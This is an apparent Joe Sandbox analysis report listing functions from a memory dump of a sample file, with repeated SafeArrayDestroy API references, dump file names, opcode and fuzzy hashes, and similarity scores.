InterlockedCompareExchange.KERNEL32(6C98C6A4,45524548,4B4F4F4C), ref: 6C8FE544

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: fa908749096458bd743301a015944a88ac815187cdad8de03cd9c4900d5487cf
Instruction ID: ef0b1fe0d73d6d3f6e185bc87d14029f3f89d3de51e87d84df485c024fba4e03
Opcode Fuzzy Hash: fa908749096458bd743301a015944a88ac815187cdad8de03cd9c4900d5487cf
Instruction Fuzzy Hash: 06D10771A002089FDB20CFA8C994BDE77B8EF59344F148979E525EBB80D774E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C908A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: cbf827cdadbdb734ff0b0eb8483db492df1d1333a5decd95784ab4e275bde20f
Instruction ID: d5e830f4430c73db162092852ef6a5b4c687963fae3f29929d261a02ca085ce6
Opcode Fuzzy Hash: cbf827cdadbdb734ff0b0eb8483db492df1d1333a5decd95784ab4e275bde20f
Instruction Fuzzy Hash: BD412874B016189FDB00DFA9CD80A5AB7FEAF89304F20858AE919DB755DB31E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C908DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 80db19f443238e3169a2de48935b77130fc2ed3899eceea5a1353eaa93856f67
Instruction ID: 47db946633deaa5541a7997e7e7718d62640bd7fde0a620fd795dfb31a6f8653
Opcode Fuzzy Hash: 80db19f443238e3169a2de48935b77130fc2ed3899eceea5a1353eaa93856f67
Instruction Fuzzy Hash: 08415B70B016189FDB00DF68CC84B9EB7BDAF89204F20869AE518EB751CB31E941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C900338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 80db19f443238e3169a2de48935b77130fc2ed3899eceea5a1353eaa93856f67
Instruction ID: 31ef710c353434bc12b1e129928b9210328182cfe3f65dd7ab6f3a8eca33223f
Opcode Fuzzy Hash: 80db19f443238e3169a2de48935b77130fc2ed3899eceea5a1353eaa93856f67
Instruction Fuzzy Hash: A3414AB0B01A189FDB00DFA9CD84BADB7BDAF89204F24859AE518E7751DB31E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C908CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1e752da6a061c8dae1cdc2c8c6d476f9ff8dd01f9e473ba69aa3b2e926ea1070
Instruction ID: 8f170c44b4c8d569d3620f2aecfbadb6a58e36d3f29e3c297ab176c4ba56f1ac
Opcode Fuzzy Hash: 1e752da6a061c8dae1cdc2c8c6d476f9ff8dd01f9e473ba69aa3b2e926ea1070
Instruction Fuzzy Hash: 5A313970B016189FCB00CFA8CD80B9EB7BDAF99204F20869AE419E7655CB71E941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C908F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 3e335372525cf434bddf60abca0c1818a6f5a094c9f6e86676a815579609d1c0
Instruction ID: 06c3d43933e7428cf6cb18c2538737ad8b80b49e22939323bac732d0a4ea844f
Opcode Fuzzy Hash: 3e335372525cf434bddf60abca0c1818a6f5a094c9f6e86676a815579609d1c0
Instruction Fuzzy Hash: CD313970B016189FCB10CFA9CC80B9EB7BEAF99204F20858AE519E7651CB75E941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C908BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1519340a3b3a1f07cca6f87cf73c3356cc8a95c3eb81637777b775378b3bf702
Instruction ID: ea0d21c7fe1cb9e053b7829a8a84dd5a75908a1617e6e420f46284234f662f76
Opcode Fuzzy Hash: 1519340a3b3a1f07cca6f87cf73c3356cc8a95c3eb81637777b775378b3bf702
Instruction Fuzzy Hash: 45312870F016189FDB10DB68CC80B9EB7BDAF99204F20859AE419E7655CB75E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C9004D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 3e335372525cf434bddf60abca0c1818a6f5a094c9f6e86676a815579609d1c0
Instruction ID: 83a43d294f5f143da6a5edda246cf20a6d45f315cba1d30c1a666d4501026ad0
Opcode Fuzzy Hash: 3e335372525cf434bddf60abca0c1818a6f5a094c9f6e86676a815579609d1c0
Instruction Fuzzy Hash: A4313B70B01A189FCB00DFA9CD84B9EB7BDAF99304F20859AE518E7651DB71D9418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9005DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 184c2ea19c2772278a3a1354ecef20c8d52947a9553d13aa0343d5d9ecbb3b26
Instruction ID: 1963d7a0d77984dcb069f424c0798eb112e623ebcd8480ce3e8860101573ff0d
Opcode Fuzzy Hash: 184c2ea19c2772278a3a1354ecef20c8d52947a9553d13aa0343d5d9ecbb3b26
Instruction Fuzzy Hash: 23314BB0B01A189FCB00CF69CD84B9DB7BEAF99204F20869AE518E7641D771E940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C900668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 9d84c6875342d7f4b13d5233fc6c7b37428307f244c62b3d74c37e406551f1a5
Instruction ID: da57e8b6c05f1bfc263133a49d79c214b1ad3fb49ea1e478135b7e13c1c5b959
Opcode Fuzzy Hash: 9d84c6875342d7f4b13d5233fc6c7b37428307f244c62b3d74c37e406551f1a5
Instruction Fuzzy Hash: 7C313B70B01A189FDB00DF69CD84B9DB7BEAF99204F20869AE518E7651CB71D941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9091A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 8f60e9737b6fe4aefd7a24579f6ee9be812dd31e527424b064587cbb38cceb4f
Instruction ID: 92647c6391b645ab1309967e78c88c853f51ec9c5075d790cfdb4459479e28be
Opcode Fuzzy Hash: 8f60e9737b6fe4aefd7a24579f6ee9be812dd31e527424b064587cbb38cceb4f
Instruction Fuzzy Hash: 1C313970B016189FCB10CFA9CD80B9EB7BDAF99204F20858AE419E7651DB75EA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C909118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 9d84c6875342d7f4b13d5233fc6c7b37428307f244c62b3d74c37e406551f1a5
Instruction ID: 42070017a187544d7498593118c7aa70747ef3ee12e95b4f33f7a9a0a6ed9001
Opcode Fuzzy Hash: 9d84c6875342d7f4b13d5233fc6c7b37428307f244c62b3d74c37e406551f1a5
Instruction Fuzzy Hash: D3313970B016189FCB10CF69CD80B9EB7BDAF99204F20859AE419E7651CB75EA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C9092C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 2eccf7a52f426b50c8abe1a1216ec3c4663652327a72f34a83b3c6c1b9025b6e
Instruction ID: 6f353c23d0ceba60f02901e48917c9e1d8d2a01de9b4764dc29096fce3e03869
Opcode Fuzzy Hash: 2eccf7a52f426b50c8abe1a1216ec3c4663652327a72f34a83b3c6c1b9025b6e
Instruction Fuzzy Hash: 03313970B016189FDB10CBA8CD80B9EB7BDAF99204F20858AE419E7651CB75ED81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C909237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
